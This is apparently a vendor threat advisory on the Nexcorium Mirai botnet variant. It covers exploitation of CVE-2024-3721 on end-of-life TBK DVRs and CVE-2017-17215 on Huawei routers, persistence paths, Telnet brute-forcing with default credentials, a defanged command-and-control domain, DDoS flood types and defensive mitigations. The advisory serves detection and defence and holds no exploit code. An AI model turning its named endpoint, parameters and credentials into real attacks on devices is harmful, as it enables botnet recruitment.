Critical Threat Research : The Iranian Cyber War Intensifies!
Comprehensive Threat Exposure Management Platform
Nexcorium is a sophisticated multi-architecture Mirai botnet variant first observed in 2026, representing an active IoT botnet campaign that exploits vulnerabilities in TBK DVR devices and Huawei routers to build large-scale distributed denial-of-service attack infrastructure. The Nexcorium botnet is deployed through exploitation of CVE-2024-3721, a critical OS command injection vulnerability affecting TBK DVR-4104 and TBK DVR-4216 devices that are now end-of-life products with no available security patches. Nexcorium threat actors manipulate HTTP request parameters on vulnerable TBK DVR endpoints to deliver a downloader shell script that fetches architecture-specific malware payloads compiled for ARM, MIPS R3000, and x86-64/AMD64 platforms. Once the Nexcorium botnet malware establishes a foothold on compromised IoT devices, it persists through multiple system-level mechanisms including modifications to /etc/inittab, /etc/rc.local, systemd services, and cron jobs. The Nexcorium botnet propagates laterally by brute-forcing adjacent IoT devices via Telnet using an extensive hard-coded credential list containing default usernames and passwords commonly found on DVRs, IP cameras, and routers. Additionally, Nexcorium includes a built-in exploit for CVE-2017-17215 targeting Huawei HG532 routers to expand the botnet infrastructure. The primary objective of the Nexcorium botnet campaign is launching large-scale distributed denial-of-service attacks via centralized command-and-control infrastructure hosted at r3brqw3d[.]b0ats[.]top. Nexcorium supports a wide range of DDoS flood techniques including UDP floods, TCP SYN floods, ACK floods, PSH floods, URG floods, SMTP floods, and VSE query attacks. The Nexcorium campaign is attributed to the Nexus Team based on a custom HTTP header “X-Hacked-By: Nexus Team – Exploited By Erratic” embedded in exploit traffic. The Nexcorium botnet represents a significant threat to organizations operating unpatched end-of-life TBK DVR surveillance systems and other IoT devices with default credentials exposed to the internet.
Nexcorium Initial Compromise: CVE-2024-3721 Exploitation and Payload Delivery
Security researchers have uncovered an active Nexcorium campaign in which threat actors are exploiting vulnerabilities in TBK DVR devices to propagate a new Mirai-based botnet variant dubbed Nexcorium across worldwide IoT infrastructure. The Nexcorium intrusion begins with the abuse of CVE-2024-3721, a critical OS command injection flaw affecting end-of-life TBK DVR-4104 and DVR-4216 surveillance models that no longer receive security updates. By targeting the /device.rsp?opt=sys&cmd= endpoint on vulnerable TBK DVR devices and manipulating the mdb/mdc parameters in HTTP requests, Nexcorium attackers are able to remotely execute arbitrary system commands with elevated privileges. Notably, the Nexcorium exploit traffic carries a custom HTTP header reading “X-Hacked-By: Nexus Team – Exploited By Erratic”, which serves as a potential attribution clue linking the Nexcorium activity to the Nexus Team threat actor group. Once initial access is gained through CVE-2024-3721 exploitation, a shell-based downloader script named “dvr” is deployed on the compromised TBK DVR device. This Nexcorium downloader retrieves architecture-specific malware payloads compiled for ARM, MIPS R3000, and x86-64/AMD64 platforms, all labeled with the nexuscorp prefix. The Nexcorium downloader assigns full execution permissions to the downloaded payloads and executes them with device-specific arguments to establish persistent botnet infection.
Nexcorium Malware Structure: Watchdog, Scanner, and Attack Modules
Once the Nexcorium payload executes on the compromised IoT device, it announces its presence with the message “nexuscorp has taken control” before initiating its core operational routines. The internal structure of Nexcorium malware closely aligns with the traditional Mirai botnet framework, comprising three primary components that enable persistent botnet operation: a watchdog module, a scanner module, and an attack module. Nexcorium configuration data, including command-and-control server details, persistence instructions, embedded exploits, and a comprehensive brute-force credential list, is obfuscated using XOR encoding with keys 0x13 and 0xFD to evade signature-based detection. The Nexcorium watchdog module, identifiable by the marker “NXS_WD_CHILD”, ensures process resilience by continuously supervising child operations and restarting failed processes. To maintain binary integrity and resist tampering, the Nexcorium malware computes a hash of its binary using the FNV-1a algorithm during execution. If discrepancies are detected in the Nexcorium binary hash, indicating potential modification or corruption, the malware automatically regenerates itself under a new randomly-generated filename with restricted permissions, reinforcing operational continuity and complicating forensic analysis efforts.
Nexcorium Propagation: Dual-Strategy Exploitation and Credential Attacks
For lateral propagation and botnet expansion, Nexcorium leverages a sophisticated dual strategy combining vulnerability exploitation with credential-based attacks. The Nexcorium malware includes a built-in exploit for CVE-2017-17215, a remote code execution vulnerability targeting end-of-life Huawei HG532 routers that remain widely deployed despite lack of vendor support. This Huawei exploit is decoded at runtime within Nexcorium memory and delivered via crafted network packets to vulnerable routers on the local network. In parallel with exploitation, Nexcorium conducts aggressive Telnet-based brute-force attacks using an extensive hard-coded credential list featuring common and vendor-default usernames and passwords such as admin, 12345, hikvision, default, and numerous manufacturer-specific credentials. Upon successful Telnet authentication, the Nexcorium scanner validates the shell environment using commands like system, sh, and cat /bin/busybox to confirm busybox availability. The Nexcorium scanner then identifies the device architecture through system fingerprinting techniques to deploy the appropriate payload variant matching the target’s processor architecture, ensuring successful infection across diverse IoT hardware platforms.
Nexcorium Persistence and DDoS Attack Capabilities
After establishing a foothold on compromised IoT devices, Nexcorium embeds itself deeply within the Linux system to ensure persistence across reboots and prevent easy removal. The Nexcorium malware copies its binary to /usr/local/bin/sysd and implements four separate persistence mechanisms to maximize survivability: modifying /etc/inittab for automatic process respawning, adding execution commands to /etc/rc.local for startup execution, creating a systemd service at /etc/systemd/system/persist.service for service-based persistence, and scheduling execution through cron jobs for periodic reinfection. To complicate forensic analysis and incident response efforts, the Nexcorium original binary is deleted immediately post-installation, leaving only the persistent copies in system directories. The primary objective of the Nexcorium botnet is conducting large-scale distributed denial-of-service operations on behalf of the botnet operators. Nexcorium supports a comprehensive range of DDoS flood techniques including UDP floods, TCP SYN floods, ACK floods, PSH floods, URG floods, SMTP floods, and VSE query attacks, providing botnet operators with flexible attack capabilities. Communication with the Nexcorium command-and-control infrastructure hosted at r3brqw3d[.]b0ats[.]top enables dynamic command execution, including directives to launch coordinated DDoS attacks against specified targets, halt ongoing attack operations (killattk), or terminate the bot instance entirely (botkill) to cover tracks or avoid detection.
Isolate or Replace End-of-Life TBK DVR Devices
TBK DVR-4104 and DVR-4216 surveillance models are end-of-life products that no longer receive firmware updates or security patches from the vendor, leaving them permanently vulnerable to Nexcorium exploitation. Organizations still operating these end-of-life TBK DVR devices should immediately disconnect them from internet-facing networks to prevent Nexcorium infection. Restrict management access to these vulnerable TBK DVR devices to trusted internal subnets only using network segmentation and firewall rules. Prioritize replacing end-of-life TBK DVR systems with actively supported surveillance alternatives that receive regular security updates from manufacturers. The lack of available patches for CVE-2024-3721 means network isolation or device replacement are the only effective mitigations against Nexcorium botnet recruitment.
Replace Default Credentials on All IoT Devices
Change all factory-default usernames and passwords on DVRs, routers, IP cameras, and other IoT devices immediately to prevent Nexcorium credential-based propagation. The Nexcorium malware carries an extensive hard-coded wordlist targeting common default credentials such as admin, 12345, hikvision, default, and numerous vendor-specific credential pairs. Implement strong, unique passwords that meet organizational password complexity requirements for all IoT device administrative interfaces. Enforce credential rotation policies to limit the window of exposure if credentials are compromised. Document all credential changes in secure password management systems and ensure administrative access is properly controlled.
Disable Telnet Services on IoT Devices
Disable Telnet services on all networked IoT devices where SSH or other secure management protocols are available as alternatives. The Nexcorium scanner module relies heavily on Telnet-based brute-force attacks for lateral propagation across IoT infrastructure. Disabling Telnet eliminates a primary attack vector used by Nexcorium for botnet expansion. For devices that require remote management, configure SSH with public key authentication instead of password authentication to prevent brute-force attacks. If Telnet cannot be disabled due to device limitations, implement network-level access controls to restrict Telnet access to specific trusted management hosts only.
Deploy IPS Signatures for CVE-2024-3721 and CVE-2017-17215
Enable intrusion prevention system signatures that detect exploitation attempts against TBK DVR command injection vulnerability (CVE-2024-3721) and Huawei HG532 remote code execution vulnerability (CVE-2017-17215). Configure IPS rules to block HTTP requests targeting the /device.rsp endpoint with suspicious mdb/mdc parameters characteristic of Nexcorium exploitation. Monitor for and block outbound connections from IoT devices to known Nexcorium command-and-control infrastructure. Deploy network behavior analysis to identify IoT devices exhibiting unusual scanning or flooding behavior indicative of Nexcorium infection.
Monitor for Nexcorium Persistence Artifacts
Proactively hunt for unauthorized modifications to Linux persistence mechanisms on IoT devices. Specifically monitor for unexpected changes to /etc/inittab, /etc/rc.local, and /etc/systemd/system/persist.service files that indicate Nexcorium persistence establishment. Search for unexpected cron job entries that execute suspicious binaries. Identify unauthorized binaries located at /usr/local/bin/sysd on Linux-based IoT devices, as this is the standard Nexcorium installation path. Regular automated auditing of these persistence locations can enable early detection of Nexcorium infections before DDoS attacks are launched. Implement file integrity monitoring on critical system files to alert on unauthorized modifications.
Segment IoT Networks with Strict Egress Filtering
Place all IoT and surveillance devices on dedicated VLANs with strict egress filtering policies to contain potential Nexcorium infections. Prevent IoT network segments from initiating outbound connections to the internet except through approved proxy or filtering gateways that can inspect and block malicious traffic. Implement network segmentation that isolates IoT devices from corporate networks and critical infrastructure. Configure firewall rules that deny inter-VLAN communication between IoT segments and production networks. This defense-in-depth approach limits the blast radius of Nexcorium infections and prevents compromised IoT devices from attacking internal resources or participating in external DDoS campaigns.
Implement DDoS Mitigation Controls
Deploy upstream DDoS mitigation services capable of absorbing or deflecting volumetric flood attacks generated by Nexcorium-infected botnets. Implement rate-limiting rules at network perimeters to detect and throttle UDP floods, TCP SYN floods, TCP ACK floods, and SMTP floods characteristic of Nexcorium DDoS attacks. Configure anomaly detection systems that baseline normal traffic patterns and alert on sudden traffic spikes indicative of DDoS activity. Establish relationships with internet service providers and DDoS mitigation vendors to enable rapid activation of scrubbing services when attacks occur. Regularly test DDoS response procedures to ensure organizational readiness for Nexcorium-generated attacks.
Initial Access
Execution
Persistence
Defense Evasion
Credential Access
Discovery
Lateral Movement
Command and Control
Impact
Nexcorium Command-and-Control Infrastructure (IPv4)
Nexcorium Command-and-Control Domain
Nexcorium Malware File Hashes (SHA256)
Get through updates and upcoming events, and more directly in your inbox